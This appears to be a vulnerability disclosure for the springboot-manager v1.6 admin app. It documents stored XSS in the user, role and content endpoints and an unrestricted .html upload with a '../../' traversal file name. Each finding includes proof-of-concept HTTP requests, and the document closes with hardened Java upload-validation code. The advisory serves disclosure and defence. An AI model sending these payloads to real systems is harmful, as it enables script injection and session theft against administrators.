Address: springboot-manager
[Suggested description]
The /sys/user interface stores user-supplied input without sanitising it, so script placed in a user field is executed whenever an administrator views the page (stored XSS). Stored XSS of this kind is more dangerous than reflected XSS because it can be used for worms, cookie theft, and similar attacks.
[Vendor of Product]
https://github.com/aitangbao/springboot-manager/releases/tag/v1.6
[Affected Product Code Base]
v1.6
[Affected Component]
/sys/user
POC
Submit the XSS payload:
PUT /sys/user HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 195
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close
{"id":"1745973977530089473","deptId":"4bd0b0a3-097d-4902-a1f7-641ea3b771bd","username":"test<script>alert(1)</script>","password":"123456","phone":"15515512345","deptName":"部门1","status":"1"}
Trigger vulnerability:
POST /sys/users HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close
{}
[Vulnerability recurrence]
The vulnerability trigger point is in User Management; the vulnerable parameter is username:
Trigger vulnerability
[Suggested description]
The /sys/role interface stores user-supplied input without sanitising it, so script placed in a role field is executed whenever an administrator views the page (stored XSS). Stored XSS of this kind is more dangerous than reflected XSS because it can be used for worms, cookie theft, and similar attacks.
[Vendor of Product]
https://github.com/aitangbao/springboot-manager/releases/tag/v1.6
[Affected Product Code Base]
v1.6
[Affected Component]
/sys/role
POC
Submit the XSS payload:
PUT /sys/role HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 135
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close
{"id":"1745993356841861121","name":"<script>alert(1)</script>","description":"<script>alert(2)</script>","status":"1","permissions":[]}
Trigger vulnerability:
POST /sys/roles HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close
{}
[Vulnerability recurrence]
The vulnerability is triggered in Role Management; the vulnerable parameters are name and description:
Trigger vulnerability
[Suggested description]
The /sysContent/add interface stores user-supplied input without sanitising it, so script placed in a content field is executed whenever an administrator views the page (stored XSS). Stored XSS of this kind is more dangerous than reflected XSS because it can be used for worms, cookie theft, and similar attacks.
[Vendor of Product]
https://github.com/aitangbao/springboot-manager/releases/tag/v1.6
[Affected Product Code Base]
v1.6
[Affected Component]
/sysContent/add
POC
Submit the XSS payload:
POST /sysContent/add HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 104
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close
{"id":"","title":"<script>alert(1)</script>","type":"0","content":"<script>alert(2)</script>","file":""}
Trigger vulnerability:
POST /sysContent/listByPage HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close
{}
[Vulnerability recurrence]
The vulnerability is triggered in Role Management; the vulnerable parameters are title and content:
Trigger vulnerability
[Suggested description]
The system does not filter the suffix of uploaded files. As a result, a file carrying an XSS payload (for example an .html file) can be uploaded, resulting in a stored XSS vulnerability.
[Vendor of Product]
https://github.com/aitangbao/springboot-manager/releases/tag/v1.6
[Affected Product Code Base]
v1.6
[Affected Component]
/sysFiles/upload
POC
POST /sysFiles/upload?authorization=A96L7u9MTzBj87Je0HWHe77m9v4T3602%23fcf34b56-a7a2-4719-9236-867495e74c31 HTTP/1.1
Host: 192.168.0.100:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysToz7xWVQvklKbQC
Connection: close
Content-Length: 214
------WebKitFormBoundarysToz7xWVQvklKbQC
Content-Disposition: form-data; name="file"; filename="../../test.html"
Content-Type: image/jpeg
<script>alert(1)</script>
------WebKitFormBoundarysToz7xWVQvklKbQC--
[Vulnerability recurrence]
The trigger point of the vulnerability is "File Management" --> "Upload File".
[Code analysis]
The upload endpoint calls sysFilesService.saveFile() to store the file.
saveFile() calls getFileType() to obtain the file suffix.
The suffix is taken from the client-supplied file name without any validation and is concatenated directly into the stored path.
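As an added illustration of the fix a defender would want here (this is hypothetical code, not the project's saveFile()/getFileType()), the suffix is derived only after the directory part of the client name is discarded, checked against an allowlist, and the stored name is chosen by the server. The allowlist contents and the class name UploadNameCheck are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Hypothetical hardened replacement for the suffix handling described above.
// The vulnerable version splices the client-supplied suffix straight into the
// stored path, so "../../test.html" is written as an HTML file the browser executes.
public final class UploadNameCheck {

    // Suffixes the file store will accept (assumed policy; adjust to the deployment).
    private static final Set<String> ALLOWED = Set.of("jpg", "jpeg", "png", "gif", "pdf");

    private UploadNameCheck() {}

    /** Lower-cased suffix of the client file name, or "" if there is none. */
    static String getFileType(String originalFilename) {
        // Drop any directory part first so a traversal prefix cannot hide the real name.
        String name = Paths.get(originalFilename).getFileName().toString();
        int dot = name.lastIndexOf('.');
        if (dot < 0 || dot == name.length() - 1) {
            return "";
        }
        return name.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** True only if the name carries no path components and its suffix is allowlisted. */
    static boolean isAllowed(String originalFilename) {
        if (originalFilename == null || originalFilename.isBlank()) {
            return false;
        }
        if (originalFilename.contains("..") || originalFilename.contains("/")
                || originalFilename.contains("\\")) {
            return false;
        }
        // The multipart Content-Type is client-controlled, so it is deliberately not consulted.
        return ALLOWED.contains(getFileType(originalFilename));
    }

    /** Builds the on-disk path from a server-chosen name plus the validated suffix. */
    static Path storedPath(Path baseDir, String originalFilename) {
        if (!isAllowed(originalFilename)) {
            throw new IllegalArgumentException("file type not allowed");
        }
        Path target = baseDir.resolve(UUID.randomUUID() + "." + getFileType(originalFilename)).normalize();
        // Defence in depth: the resolved path must remain inside the upload directory.
        if (!target.startsWith(baseDir.normalize())) {
            throw new IllegalArgumentException("path escapes upload directory");
        }
        return target;
    }
}
```

Serving stored uploads with a non-HTML Content-Type, X-Content-Type-Options: nosniff and Content-Disposition: attachment is a complementary mitigation, since the payload only runs if the browser renders the file inline in the application's origin.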